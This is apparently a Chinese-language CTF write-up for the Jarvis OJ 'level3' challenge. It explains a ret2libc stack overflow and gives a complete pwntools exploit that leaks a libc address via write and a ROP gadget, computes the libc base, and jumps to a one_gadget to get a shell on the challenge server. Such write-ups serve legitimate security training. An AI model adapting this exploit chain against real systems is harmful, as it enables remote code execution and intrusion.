题目来源 Jsarvis OJ level3
附件下载链接:level3.rar.f795bbaa1e4a3f9d467317d6df936c6b
这道题为典型的ret2libc
找到存在栈溢出的函数,很明显变量buf只有0x88字节的缓存空间,但是可以输入0x100字节的数据,所以存在溢出
然后利用write输出打印得到我们想要泄露的got地址,这里我是通过rop链0x8048519来清空write的三个参数,从而通过ret将eip再次指向vulnerable_function函数,达到两次栈溢出目的
然后one_gedget就行了
exp:
from pwn import *
io=remote("pwn2.jarvisoj.com",9879)
e=ELF("./level3")
lib=ELF("./libc-2.19.so")
main=e.got['__libc_start_main']
payload=b'a'*0x8c+p32(e.plt['write'])+p32(0x8048519)+p32(1)+p32(main)+p32(4)+p32(e.symbols['vulnerable_function'])
io.recv()
io.sendline(payload)
lib_main=u32(io.recv(4))
base=lib_main-lib.symbols['__libc_start_main']
onegadget=base+0x401b3
payload1=b'a'*0x8c+p32(onegadget)
io.sendlineafter('\n',payload1)
io.interactive()